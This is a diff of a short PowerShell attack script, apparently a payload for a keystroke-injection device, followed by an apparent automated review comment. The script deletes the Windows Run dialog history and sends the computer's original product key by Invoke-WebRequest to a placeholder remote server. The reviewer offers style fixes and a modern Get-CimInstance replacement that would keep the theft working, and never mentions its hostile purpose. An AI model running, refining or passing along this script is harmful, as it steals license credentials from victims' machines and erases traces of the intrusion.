@ -1,10 +1,8 @@
|
|||
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
#clear windows run dialog history
|
||||
#Clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#retrieve and send the computer's original product key to a remote server
|
||||
Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
||||
|
||||
Exit
|
||||
#Retrieve and send the computer's original product key to a remote server
|
||||
Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
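Review bot: as with the one-liner, the `<REMOTE_IP_ADDRESS>` placeholder conflicts with the `example.com`-plus-`DEFINE` convention the contributing guide requires, and the angle brackets make `-Uri "http://<REMOTE_IP_ADDRESS>?duckey=..."` a URI parse error if left unedited. Style: `Get-WmiObject` is deprecated and absent from PowerShell 7, so `Get-CimInstance -ClassName SoftwareLicensingService` is the supported equivalent on the Windows 10/11 targets listed. Removing `Exit` is fine; the hidden PowerShell exits on its own once the command string completes.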
|
||||
|
|